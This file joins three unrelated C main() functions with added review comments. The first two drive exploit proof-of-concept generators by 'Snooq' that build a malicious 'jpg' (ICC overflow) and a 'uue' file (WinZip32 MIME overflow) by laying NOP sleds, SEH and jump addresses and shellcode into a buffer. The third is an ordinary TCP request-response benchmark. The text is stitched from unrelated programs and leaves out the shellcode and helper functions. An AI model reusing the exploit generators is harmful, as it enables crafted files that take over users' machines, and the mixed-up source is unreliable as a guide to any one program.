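/*
 * Entry point of the proof-of-concept 'jpg' file generator.
 *
 * Usage: <prog> [target-number]
 *
 * The optional argument is a 1-based index into the targets[] table; when it
 * is absent the compile-time default TARGET is used.  The selected entry's
 * jmpADD field is passed to get_bytes(), then filladdr(), fillshellcode() and
 * buildfile() are called in that order.
 *
 * Returns 0 on success, 1 when the target number is smaller than 1.
 */
int main(int argc, char *argv[])
{
    int t = TARGET;

    if (argc == 2) {
        t = atoi(argv[1]);
    }

    /*
     * targets[] is indexed with t-1, so any value below 1 (including the 0
     * that atoi() yields for non-numeric input) would read before the start
     * of the table.
     * NOTE(review): the number of entries in targets[] is not visible from
     * this function, so the upper bound is still unchecked -- confirm against
     * the table definition and reject values past its last entry.
     */
    if (t < 1) {
        fprintf(stderr, "invalid target number: %d\n", t);
        return 1;
    }

    get_bytes(targets[t - 1].jmpADD);

    printf("\nICC Overflow PoC, By Snooq [[email protected]]\n\n");
    printf("-> Generating 'jpg' file for target #%d...\n", t);

    filladdr();
    fillshellcode();
    buildfile();

    return 0;
}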
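/*
 * Entry point of the proof-of-concept 'uue' file generator.
 *
 * Usage: <prog> [target-number]
 *
 * The optional argument is a 1-based index into the targets[] table; when it
 * is absent the compile-time default TARGET is used.  The selected entry's
 * topSEH and jmpADD fields are stored in the globals `where` and `what`, the
 * global buffer `buff` is assembled, and buildfile() is called.
 *
 * Returns 0 on success, 1 when the target number is smaller than 1.
 */
int main(int argc, char *argv[])
{
    int t = TARGET;

    if (argc == 2) {
        t = atoi(argv[1]);
    }

    /*
     * targets[] is indexed with t-1, so any value below 1 (including the 0
     * that atoi() yields for non-numeric input) would read before the start
     * of the table.
     * NOTE(review): the number of entries in targets[] is not visible from
     * this function, so the upper bound is still unchecked -- confirm against
     * the table definition and reject values past its last entry.
     */
    if (t < 1) {
        fprintf(stderr, "invalid target number: %d\n", t);
        return 1;
    }

    where = targets[t - 1].topSEH;
    what = targets[t - 1].jmpADD;

    printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [[email protected]]\n\n");

    /* Pre-fill the whole buffer, then lay the individual pieces over it. */
    memset(buff, NOP, BSIZE);

    printf("-> Generating 'uue' file for target #%d...\n", t);

    memcpy(buff, header, HSIZE);
    filladdr();

    /*
     * NOTE(review): assumes HSIZE + IDXOFF + 4 + PAD + SSIZE <= BSIZE; the
     * constants are defined outside this function and nothing here checks
     * that the copy stays inside buff -- confirm against their definitions.
     */
    memcpy(buff + HSIZE + IDXOFF + 4 + PAD, shellcode, SSIZE);

    buildfile();

    return 0;
}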
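/*
 * Entry point of the TCP request-response test tool.
 *
 * After parse_args() has run, the args_* globals are validated, the address
 * is built with filladdr(), and the program runs in one of two modes:
 *
 *   - server (args_s set): listen on the address and start one rr_thread per
 *     accepted connection;
 *   - client (args_s clear): open args_t connections, start one rr_thread per
 *     connection, then print aggregated statistics once per second, forever.
 *
 * When CHECK_RTO_RETRANS is enabled, a checker thread (and, in server mode, a
 * stats thread) is started before either mode begins.
 *
 * Returns 0 when the server's accept loop ends; the client loop never
 * returns.  Errors go through ERROR_DIE / PERROR_DIE, which are defined
 * elsewhere and presumably terminate the process -- the code below relies on
 * that, as the original checks already did.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in addr;
    int so;

    parse_args(argc, argv);

    if (args_addr == NULL) {
        ERROR_DIE("-addr is missing\n");
    }
    if (args_port <= 0) {
        ERROR_DIE("-port is missing\n");
    }
    if (args_m <= 0) {
        ERROR_DIE("-m must be > 0\n");
    }
    if (args_m > 8*1024) {
        ERROR_DIE("-m must be <= 8192\n");
    }
    if (args_sleep < 0) {
        ERROR_DIE("-sleep must be >= 0\n");
    }

    memset(&addr, 0, sizeof(addr));
    if (0 != filladdr(args_addr, &addr)) {
        ERROR_DIE("filladdr\n");
    }
    addr.sin_port = htons(args_port);

#if CHECK_RTO_RETRANS
    pthread_mutex_init(&checker_lock, NULL);
    checker_so_num = 0;
    memset(checker_so, -1, sizeof(checker_so));
    {
        pthread_attr_t attr;
        pthread_t tid;

        pthread_attr_init(&attr);
        pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM);
        pthread_create(&tid, &attr, check_thread, NULL);
        if (args_s)
            pthread_create(&tid, &attr, stat_thread, NULL);
    }
#endif

    if (args_s) {
        int one = 1;
        int new_conn;
        int id = 0;
        struct rr *r;

        so = socket(AF_INET, SOCK_STREAM, 0);
        if (so < 0) {
            PERROR_DIE("socket");
        }
        if (0 != setsockopt(so, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one))) {
            PERROR_DIE("setsockopt(SO_REUSEADDR)");
        }
        if (0 != bind(so, (const struct sockaddr*)&addr, sizeof(addr))) {
            PERROR_DIE("bind");
        }
        if (0 != listen(so, args_backlog)) {
            PERROR_DIE("listen");
        }

        /*
         * The loop ends as soon as accept() fails (it would also end on
         * descriptor 0), after which main returns 0.
         * NOTE(review): every accepted connection gets its own thread and
         * nothing here caps their number; acceptable for a test tool on a
         * trusted network, worth bounding anywhere else.
         */
        while ((new_conn = accept(so, NULL, NULL)) > 0) {
            log_msg("server accepted a conn. so=%d id=%d\n", new_conn, id);

            /* calloc zero-fills; the result must be checked before use. */
            r = calloc(1, sizeof(*r));
            if (r == NULL) {
                PERROR_DIE("calloc");
            }
            r->id = id++;
            r->so = new_conn;
            r->server = 1;

            pthread_attr_init(&r->attr);
            pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM);
            /* thread frees r */
            /* We want to use threads, not events, for this test */
            if (0 != pthread_create(&r->tid, &r->attr, rr_thread, r)) {
                /* Without the thread nobody would free r or serve the socket. */
                ERROR_DIE("pthread_create\n");
            }
        }
    } else {
        struct rr *ra, *r;
        int i;
        struct hist prev_hist, cur_hist;
        uint32_t prev_count, cur_count;

        /*
         * calloc zero-fills and rejects a count * size product that would
         * overflow.  A NULL result is only tolerated for a zero count, where
         * the loops below never touch the array.
         */
        ra = calloc(args_t, sizeof(*ra));
        if (ra == NULL && args_t != 0) {
            PERROR_DIE("calloc");
        }

        for (i = 0; i < args_t; i++) {
            so = socket(AF_INET, SOCK_STREAM, 0);
            if (so < 0) {
                PERROR_DIE("socket");
            }
            if (0 != connect(so, (struct sockaddr*)&addr, sizeof(addr))) {
                PERROR_DIE("connect");
            }
            log_msg("connected to server. so=%d id=%d\n", so, i);

            r = &ra[i];
            r->id = i;
            r->so = so;
            r->msg_len = args_m;
            r->sleep = args_sleep;

            pthread_attr_init(&r->attr);
            pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM);
            if (0 != pthread_create(&r->tid, &r->attr, rr_thread, r)) {
                /* A missing worker would silently skew the reported rates. */
                ERROR_DIE("pthread_create\n");
            }
        }

        /* Print stats forever */
        memset(&prev_hist, 0, sizeof(prev_hist));
        prev_count = 0;
        while (1) {
            sleep(1);

            /* Gather stats from threads */
            memset(&cur_hist, 0, sizeof(cur_hist));
            cur_count = 0;
            for (i = 0; i < args_t; i++) {
                int j;

                r = &ra[i];
                cur_count += r->stat_count;
                for (j = 0; j < HIST_BIN_COUNT; j++)
                    cur_hist.bin[j] += r->hist.bin[j];
            }

            /* Totals are cumulative; the difference is the last interval. */
            printf("%u request-responses/s\n", cur_count - prev_count);
            for (i = 0; i < HIST_BIN_COUNT; i++) {
                printf("%d: %u[%u]\n", ((i+1) * HIST_BIN_WIDTH),
                       cur_hist.bin[i],
                       cur_hist.bin[i] - prev_hist.bin[i]);
            }

            prev_count = cur_count;
            /* struct copy */
            prev_hist = cur_hist;

#if CHECK_RTO_RETRANS
            print_checker();
#endif
        }
    }

    return 0;
}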